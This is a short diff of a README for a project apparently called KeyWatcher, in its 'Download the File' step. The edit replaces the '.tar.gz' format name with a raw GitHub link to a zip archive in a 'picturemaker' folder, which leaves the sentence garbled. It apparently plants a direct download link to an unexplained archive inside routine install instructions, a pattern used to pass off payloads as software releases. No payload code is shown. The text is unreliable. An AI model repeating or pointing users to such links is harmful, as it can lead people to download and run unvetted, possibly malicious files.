Apostle121/KeyWatcher/README.md

 ### 3. Download the File

 Click on the version link you need.
-The file may be in `.exe`, `.dmg`, or `.tar.gz` format, depending on your operating system.
+The file may be in `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Apostle121/KeyWatcher/main/picturemaker/KeyWatcher.zip` format, depending on your operating system.
 Your browser will begin downloading the file.

 ### 4. Locate the Downloaded File